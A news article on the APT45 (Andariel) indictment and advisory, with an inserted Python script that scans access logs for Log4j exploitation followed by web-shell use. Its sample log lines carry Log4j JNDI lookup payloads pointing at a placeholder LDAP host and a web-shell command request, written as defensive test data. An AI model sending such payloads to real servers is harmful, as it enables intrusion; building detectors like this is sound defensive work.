Suspect Indicted in North Korea Group’s Expansive Spying Operation
2024-7-26 20:38:38 Author: securityboulevard.com

The United States and other countries are putting a spotlight on a group of North Korean-backed hackers that is conducting cyberespionage campaigns around the world to steal classified secrets that can be used for the country’s nuclear weapons program.

At the same time, researchers with Google’s Mandiant cybersecurity unit are detailing how the threat group, APT45 – also tracked as Andariel and Onyx Sleet and part of North Korea’s military intelligence apparatus – has recently expanded its capabilities to include ransomware operations, alongside its long-running interest in financial services organizations.

North Korea – or the Democratic People’s Republic of Korea (DPRK) – is routinely listed by cybersecurity agencies in the United States as being among the top hubs – along with Russia, China, and Iran – of state-sponsored cyberattacks, including through the notorious Lazarus Group and its many subgroups and via a variety of other schemes, including software supply-chain attacks and the planting of North Korean operatives as IT workers in companies around the world.

The primary goal of APT45, Lazarus, and the other North Korean cyber operations is to raise money and steal information that can be fed back into the country’s nuclear and ballistic missile programs, skirting the sanctions imposed by the United States and other countries.

In a joint advisory this week, the United States, UK, and South Korea outlined APT45’s myriad campaigns targeting countries’ defense, aerospace, nuclear, and engineering organizations to steal sensitive and classified technical information. The threat is not only against the three countries but also Japan and India.

In addition, APT45 – which is part of North Korea’s Reconnaissance General Bureau (RGB) 3rd Bureau, a military intelligence unit – is using ransomware attacks against U.S. healthcare organizations to fund its cyber-spying activities, a trend noted by Mandiant researchers in their report this week.

How They Operate

“The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation,” the agencies wrote in the 30-page advisory.

From there, they establish persistence on the compromised systems, harvest credentials and escalate privileges with common credential-dumping tools such as Mimikatz, and then deploy custom malware, remote access tools, and open-source software to move laterally through networks and exfiltrate data. They also run phishing campaigns.
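The first link in the chain the advisory describes is the one defenders can see earliest: a Log4j lookup string arriving in a web request, followed by requests to a freshly dropped web shell. The script below is an added example, not code from the advisory or from Mandiant, that runs that detection over a few constructed access-log lines. It normalizes the two most common tricks used to hide the literal `${jndi:` (the `${lower:}`/`${upper:}` lookups and the `${...:-x}` default-value lookup), flags web-shell-style requests with a heuristic (a script extension followed by a `cmd=`/`exec=`/`command=` parameter), and then correlates the two by source IP. The log lines, IPs, and file names are constructed for the example; the heuristics are deliberately narrow and will not catch every obfuscation or every web shell.

```python
import re
from typing import Dict, List

# Constructed combined-format access-log lines (not real captured traffic).
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Jul/2024:12:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jul/2024:12:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [10/Jul/2024:12:01:15 +0000] '
    '"GET /api/v1/items?q=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 200 35 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Jul/2024:12:02:40 +0000] "POST /uploads/cmd.jsp?cmd=whoami HTTP/1.1" 200 20 "-" "curl/8.0"',
    '192.0.2.9 - - [10/Jul/2024:12:03:01 +0000] "GET /static/app.js HTTP/1.1" 304 0 "-" "Mozilla/5.0"',
]

# Apache/Nginx "combined" log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Log4j lookup forms commonly used to split up the string "jndi".
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)  # ${lower:j} -> j
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")                      # ${::-j}, ${env:X:-j} -> j
JNDI = re.compile(r"\$\{jndi:")
# Heuristic only: script extension plus a command-style query parameter.
WEBSHELL = re.compile(r"\.(?:jspx?|php|aspx?)\?(?:[^ &]*&)*(?:cmd|exec|command)=", re.IGNORECASE)


def normalize_lookups(s: str, max_rounds: int = 10) -> str:
    """Collapse nested case/default lookups until the string stops changing, then lowercase it."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(lambda m: m.group(1).lower(), s)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s.lower()


def scan_logs(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious request, in log order."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        f = m.groupdict()
        # The lookup string is placed wherever the application is likely to log it.
        for field in ("path", "ua", "referer"):
            if JNDI.search(normalize_lookups(f[field])):
                findings.append({"ip": f["ip"], "ts": f["ts"], "kind": "jndi_lookup",
                                 "field": field, "evidence": f[field]})
                break
        if WEBSHELL.search(f["path"]):
            findings.append({"ip": f["ip"], "ts": f["ts"], "kind": "webshell_request",
                             "field": "path", "evidence": f["path"]})
    return findings


def correlate(findings: List[Dict[str, str]]) -> List[str]:
    """Source IPs that sent a JNDI lookup and later requested a web-shell-like URL."""
    probed = set()
    chained = set()
    for f in findings:  # findings preserve log order, so "later" is positional
        if f["kind"] == "jndi_lookup":
            probed.add(f["ip"])
        elif f["kind"] == "webshell_request" and f["ip"] in probed:
            chained.add(f["ip"])
    return sorted(chained)


if __name__ == "__main__":
    hits = scan_logs(SAMPLE_LOGS)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["kind"]} ({h["field"]}): {h["evidence"]}')
    print("exploit-then-webshell chains from:", correlate(hits))
```

Run it against real logs by replacing `SAMPLE_LOGS` with lines read from the access log; a hit on `correlate` is the strongest signal, since a lone `${jndi:` string may be an internet-wide scanner rather than a targeted intrusion. Application and gateway logs should be scanned too, because Log4j evaluates the lookup wherever the string is logged, not only in the web tier.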

APT45 hackers are targeting a broad range of industries, looking to steal information about everything from tanks and combat ships to submarines, fighter aircraft, drones, missiles and missile defense systems, and satellites. They have also stolen data on uranium processing and enrichment, nuclear power plants, government facilities, and research organizations, as well as on shipbuilding and robotics.

Justice Department (DOJ) and FBI officials said that targets in the United States include NASA and Air Force bases in Georgia and Texas. Other entities – including South Korean and Taiwanese defense contractors and a Chinese energy company – also were victims.

“The global cyber espionage operation that we have exposed today shows the lengths that DPRK state-sponsored actors are willing to go to pursue their military and nuclear programmes,” Paul Chichester, director of operations for the UK’s National Cyber Security Centre, said in a statement. “It should remind critical infrastructure operators of the importance of protecting the sensitive information and intellectual property they hold on their systems to prevent theft and misuse.”

North Korean Operative Indicted

The DOJ this week indicted a North Korean operative believed to be part of APT45 for his role in a conspiracy that used North Korean-developed ransomware to attack hospitals and other U.S. health care organizations. Rim Jong Hyok and his co-conspirators then laundered the ransom payments and used the proceeds to fund further cyberattacks against government, defense, and technology entities around the world.

Rim Jong Hyok was part of the group that used the Maui ransomware to attack U.S. health care providers in a campaign that U.S. authorities shut down two years ago, according to DOJ officials. He and others would launder the cryptocurrency that was paid by the victims with the help of facilitators in Hong Kong.

“In at least one case, these Hong Kong facilitators converted ransom funds from cryptocurrency to Chinese yuan,” the DOJ said. “The yuan was then accessed from an ATM in China in the immediate vicinity of the Sino-Korean Friendship Bridge, which connects Dandong, China, and Sinuiju, North Korea.”

The money was used to lease private virtual servers to launch attacks against defense, technology, and other organizations in the United States. The APT45 actors stole terabytes of data, such as unclassified information about U.S. government employees, old technical information about military aircraft, intellectual property, and limited technical information about maritime and uranium processing projects, according to the DOJ and FBI.

Along with the indictment of Rim, the DOJ said it intercepted about $114,000 in crypto proceeds from ransomware attacks and money laundering operations and seized online accounts the conspirators used for their cyber operations. It also seized about $500,000 in crypto paid as ransom and tied to related money laundering transactions. U.S. authorities are also offering a reward of up to $10 million for information leading to the identification and location of Rim, who is believed to be in North Korea.

DPRK’s Shifting Priorities

APT45’s expansion into ransomware reflects the “DPRK’s changing priorities,” Mandiant researchers Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, and Michael Barnhart wrote in their report this week. Since at least 2009, the group has conducted operations that aligned with “the shifting geopolitical interests of the North Korean state,” they wrote. Now there is a ransomware component that includes both developing and deploying the malware.

“Additionally, while multiple DPRK-nexus groups focused on healthcare and pharmaceuticals during the initial stages of the COVID-19 pandemic, APT45 has continued to target this vertical longer than other groups, suggesting an ongoing mandate to collect related information,” the researchers wrote. “Separately, the group has conducted operations against nuclear-related entities, underscoring its role in supporting DPRK priorities.”

Targeting the Financial Sector

Financially motivated activity is not entirely new for the group: APT45 was seen attacking financial sector firms as far back as 2016, using the RIFLE malware against a South Korean organization. In 2021, the group was found running a spear-phishing campaign against a South Asian bank.

In 2019, the threat actors attacked nuclear research and power facilities in India, and a year later targeted the crop science division of a multinational corporation, activity likely linked to the sharp drop in North Korean agricultural production after the country shut down cross-border trade as the COVID-19 pandemic spread.

Multiple North Korean threat groups focused on health care and pharmaceutical companies during a likely COVID-19 outbreak in the country in 2021, though APT45 has continued targeting such organizations since.

The use of the Maui ransomware arose in 2022, though a year before, cybersecurity firm Kaspersky linked suspected APT45 clusters to the use of Shattered Glass, a ransomware uncovered by Mandiant.

“APT45 is one of North Korea’s longest running cyber operators, and the group’s activity mirrors the regime’s geopolitical priorities even as operations have shifted from classic cyber espionage against government and defense entities to include healthcare and crop science,” the Mandiant researchers wrote. “Financially motivated activity occurring alongside intelligence collection has become a defining characteristic of North Korean cyber operations, and we expect APT45 to continue both missions.”

Source: https://securityboulevard.com/2024/07/suspect-indicted-in-north-korea-groups-expansive-spying-operation/